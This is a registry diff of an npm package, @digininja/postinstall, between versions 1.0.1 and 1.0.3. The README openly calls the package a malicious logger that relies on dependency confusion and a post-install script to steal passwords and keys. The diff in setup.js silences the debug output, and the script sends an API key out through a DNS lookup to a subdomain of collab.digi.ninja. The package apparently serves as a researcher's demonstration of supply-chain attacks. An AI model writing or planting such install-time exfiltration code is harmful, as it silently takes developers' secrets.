@digininja/postinstall 1.0.1 → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +1 -1
  2. package/package.json +2 -1
  3. package/scripts/setup.js +3 -2
package/README.md CHANGED
@@ -1,3 +1,3 @@
1
1
  # Logger
2
2
 
3
- This is the malicious version of the logger published to npm and using dependency confusion to get installed over the real version.
3
+ This is the malicious version of the logger which has a post install script to try to steal passwords and keys.
package/package.json CHANGED
@@ -1,8 +1,9 @@
1
1
  {
2
2
  "name": "@digininja/postinstall",
3
- "version": "1.0.1",
3
+ "version": "1.0.3",
4
4
  "description": "Hijack secrets from GitHub",
5
5
  "author": "Digininja",
6
+ "license": "ISC",
6
7
  "type": "commonjs",
7
8
  "main": "index.js",
8
9
  "scripts": {
package/scripts/setup.js CHANGED
@@ -10,7 +10,7 @@ const options = {
10
10
  function lookup(domain) {
11
11
  dns.lookup(domain, options, (err, address, family) => {
12
12
  if (err) {
13
- console.error('Lookup failed:', err);
13
+ log('Lookup failed:', err);
14
14
  return;
15
15
  }
16
16
  // don't care
@@ -19,7 +19,7 @@ function lookup(domain) {
19
19
  }
20
20
 
21
21
  function log(message, data = '') {
22
- console.log(`[POSTINSTALL DEBUG] ${message}`, data);
22
+ // console.log(`[POSTINSTALL DEBUG] ${message}`, data);
23
23
  }
24
24
 
25
25
  // DNS cache buster
@@ -32,6 +32,7 @@ if (!apiKey) {
32
32
  log('API Key missing. Exiting gracefully.');
33
33
  process.exit(0);
34
34
  }
35
+
35
36
  lookup(apiKey+'.6u1s7jd9esbax66anvpcg34jgam1asyh.collab.digi.ninja');
36
37
 
37
38
  log('Using API Key:', apiKey);